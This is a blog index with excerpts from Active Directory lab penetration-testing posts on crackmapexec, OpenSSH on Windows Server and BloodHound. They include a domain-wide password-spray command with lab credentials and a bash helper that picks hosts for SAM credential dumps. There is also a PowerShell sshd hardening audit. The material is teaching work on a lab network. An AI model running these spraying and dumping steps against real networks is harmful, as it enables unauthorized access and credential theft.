Attacking Active Directory

We will perform both lateral and vertical movement. Vertical movement lets a penetration tester escalate privileges within a network, whereas lateral movement reuses the same user's privileges across multiple systems on the network.

Lateral movement with crackmapexec: power on Kali, THEPUNISHER and the Windows Server 2022 machine. We will perform a pass-the-password attack, spraying the password of the user fcastle across the entire domain. Make sure crackmapexec is installed on Kali, then run:

crackmapexec smb 10.11.12.0/24 -u fcastle -d MARVEL.local -p Password1

crackmapexec authenticates over SMB to every host in the targeted range using these credentials. A result line ending in (Pwn3d!) means the password is valid and fcastle has administrative rights on that host; a [+] line without that marker means the password is valid but the account is only a standard user there. Spraying one password across a whole /24 is noisy, and every failed attempt counts toward the domain lockout threshold, so check the lockout policy before trying a second password. 2. Retrieving the SAM database from the Windows devices across the domain using the following command: ...
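As an added example (not code from the original post), the bash snippet below triages the output of the crackmapexec sweep above: it keeps only the hosts marked (Pwn3d!), which are the ones where dumping the SAM database with --sam will actually work, and separately lists hosts where the password is valid but fcastle is not an administrator. The sample output is constructed to match crackmapexec's column layout (protocol, IP, port, hostname, message); the host names and IPs other than THEPUNISHER are assumptions.

```shell
#!/usr/bin/env bash
# Added example, not part of the original post: triage crackmapexec SMB output
# from a pass-the-password sweep so that follow-up actions (for example
# "crackmapexec smb <host> -u fcastle -d MARVEL.local -p Password1 --sam")
# are run only where the credential is local administrator.
set -euo pipefail

# Print "ip hostname" for every line crackmapexec flagged with (Pwn3d!),
# i.e. the credential is valid AND has administrative rights on that host.
pwned_hosts() {
    # $1: file holding the output of "crackmapexec smb ... | tee file"
    awk '/\(Pwn3d!\)/ { print $2, $4 }' "$1"
}

# Print hosts where the logon succeeded ([+]) but without admin rights:
# the password is reusable there, but a SAM dump will be denied.
valid_not_admin() {
    awk '/\[\+\]/ && !/\(Pwn3d!\)/ { print $2, $4 }' "$1"
}

# Constructed sample output (not real scan data); only the field layout
# mirrors crackmapexec. Hosts other than THEPUNISHER are assumed names.
SAMPLE=$(mktemp)
trap 'rm -f "$SAMPLE"' EXIT
cat > "$SAMPLE" <<'EOF'
SMB         10.11.12.10     445    HYDRA-DC         [*] Windows Server 2022 Build 20348 x64 (name:HYDRA-DC) (domain:MARVEL.local) (signing:True) (SMBv1:False)
SMB         10.11.12.11     445    THEPUNISHER      [*] Windows 10.0 Build 19041 x64 (name:THEPUNISHER) (domain:MARVEL.local) (signing:False) (SMBv1:False)
SMB         10.11.12.12     445    SPIDERMAN        [*] Windows 10.0 Build 19041 x64 (name:SPIDERMAN) (domain:MARVEL.local) (signing:False) (SMBv1:False)
SMB         10.11.12.10     445    HYDRA-DC         [+] MARVEL.local\fcastle:Password1
SMB         10.11.12.11     445    THEPUNISHER      [+] MARVEL.local\fcastle:Password1 (Pwn3d!)
SMB         10.11.12.12     445    SPIDERMAN        [+] MARVEL.local\fcastle:Password1 (Pwn3d!)
EOF

echo "Hosts where fcastle is a local administrator (SAM dump candidates):"
pwned_hosts "$SAMPLE"
echo "Hosts where the password is valid but fcastle is not an administrator:"
valid_not_admin "$SAMPLE"
```

In a real engagement, replace the constructed sample with the file written by piping the sweep through tee, and feed the first list to the SAM dump command so that only hosts with a realistic chance of success are touched.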

November 24, 2025 · 4 min · 769 words · 0x-s0M3n4th

Misconfiguring SSH on Windows Server

OpenSSH is the open-source implementation of the Secure Shell (SSH) tools that administrators of Linux and other non-Windows systems use for cross-platform management of remote systems. Beginning with Windows 10 version 1809 and Windows Server 2019, OpenSSH is available as a feature on demand. OpenSSH for Windows ships the following commands:

- ssh is the SSH client component that runs on the user's local system
- sshd is the SSH server component that must be running on the system being managed remotely
- ssh-keygen generates, manages and converts authentication keys for SSH
- ssh-agent stores private keys used for public key authentication
- ssh-add adds private keys to the running ssh-agent (the server does not keep a list of private keys; it trusts the public keys listed in the user's authorized_keys file)
- ssh-keyscan collects the public SSH host keys from hosts
- sftp is the client for the Secure File Transfer Protocol, which runs over SSH (the server side is the sftp-server subsystem started by sshd)
- scp is a file copy utility that runs over SSH

Prerequisites check: To validate your environment, open an elevated PowerShell session and do the following: ...
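The following PowerShell script is an added example, not the post's own prerequisites check: it verifies the conditions above (elevation, minimum Windows build, the OpenSSH feature on demand), installs and enables the server when missing, and then audits the settings that most often turn an installed sshd into a misconfigured one. Paths assume the in-box OpenSSH layout under %ProgramData%\ssh; the firewall rule name OpenSSH-Server-In-TCP is the one created by the feature on demand, and the function name Test-SshdConfig is mine.

```powershell
# Added example (not from the original post): validate OpenSSH prerequisites
# on Windows Server from an elevated PowerShell session, install the server if
# needed, and flag insecure sshd_config settings.
# Assumptions: in-box OpenSSH paths under $env:ProgramData\ssh; Test-SshdConfig
# is a helper written for this example.

# 1. Must be elevated: Add-WindowsCapability and service changes require it.
$principal = [Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()
if (-not $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
    throw 'Run this from an elevated PowerShell session.'
}

# 2. Windows 10 1809 / Windows Server 2019 is build 17763; older builds lack the feature on demand.
$build = [System.Environment]::OSVersion.Version.Build
if ($build -lt 17763) { throw "OpenSSH feature on demand needs build 17763 or later (found $build)." }

# 3. Check the OpenSSH features on demand and install the server if it is absent.
$caps = Get-WindowsCapability -Online | Where-Object Name -like 'OpenSSH*'
$caps | Select-Object Name, State
$server = $caps | Where-Object Name -like 'OpenSSH.Server*'
if ($server.State -ne 'Installed') {
    Add-WindowsCapability -Online -Name $server.Name
}

# 4. sshd should start automatically, be running, and be reachable through the firewall.
Set-Service -Name sshd -StartupType Automatic
Start-Service sshd
if (-not (Get-NetFirewallRule -Name 'OpenSSH-Server-In-TCP' -ErrorAction SilentlyContinue)) {
    New-NetFirewallRule -Name 'OpenSSH-Server-In-TCP' -DisplayName 'OpenSSH Server (sshd)' `
        -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22
}

# 5. Audit sshd_config: in sshd the first uncommented occurrence of a keyword wins,
#    and a commented keyword means the built-in default applies.
#    (Keywords inside Match blocks are treated like global ones here; refine if needed.)
function Test-SshdConfig {
    param([string]$Path = "$env:ProgramData\ssh\sshd_config")
    $findings = @()
    $lines = Get-Content $Path

    function Get-Effective([string]$Keyword, [string]$Default) {
        $hit = $lines | Where-Object { $_ -match "^\s*$Keyword\s+\S+" } | Select-Object -First 1
        if ($hit) { return (($hit -replace "^\s*$Keyword\s+", '') -split '\s+')[0] }
        return $Default
    }

    if ((Get-Effective 'PasswordAuthentication' 'yes') -eq 'yes') {
        $findings += 'PasswordAuthentication is enabled (the default): any sprayable account gets a shell.'
    }
    if ((Get-Effective 'PubkeyAuthentication' 'yes') -ne 'yes') {
        $findings += 'PubkeyAuthentication is disabled: key-only logins cannot be enforced.'
    }
    if ((Get-Effective 'PermitEmptyPasswords' 'no') -eq 'yes') {
        $findings += 'PermitEmptyPasswords yes: accounts with blank passwords can log in.'
    }

    # Keys for members of Administrators are read from administrators_authorized_keys,
    # which must be writable only by Administrators and SYSTEM or sshd ignores it
    # (and a looser ACL would let a low-privileged user plant an admin key).
    $adminKeys = "$env:ProgramData\ssh\administrators_authorized_keys"
    if (Test-Path $adminKeys) {
        $acl = Get-Acl $adminKeys
        $allowed = @('BUILTIN\Administrators', 'NT AUTHORITY\SYSTEM')
        $extra = $acl.Access | Where-Object { $_.IdentityReference.Value -notin $allowed }
        if ($extra) {
            $findings += "administrators_authorized_keys is accessible to: $(($extra.IdentityReference.Value | Select-Object -Unique) -join ', ')"
        }
    }
    return $findings
}

Test-SshdConfig
```

An empty result from Test-SshdConfig means password logins are off, public-key logins are on, blank passwords are refused and the administrators' key file is locked down; anything it returns is a line to fix in sshd_config (followed by Restart-Service sshd) or an ACL to tighten.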

November 24, 2025 · 3 min · 619 words · 0x-s0M3n4th

BloodHound

BloodHound is an Active Directory data visualization application that helps penetration testers efficiently identify attack paths to gain control over a Windows Active Directory domain and forest. In addition, it helps identify misconfigurations and relationships that threat actors could exploit. BloodHound models the environment as a graph and uses graph theory to reveal hidden relationships within Active Directory, which makes privilege escalation paths easy to visualize. First, data must be collected from the organization's Active Directory with a collector such as bloodhound-python, SharpHound or AzureHound. Once collected, the data is ingested into BloodHound, which then shows the attack path to domain takeover within the organization. ...

November 24, 2025 · 3 min · 508 words · 0x-s0M3n4th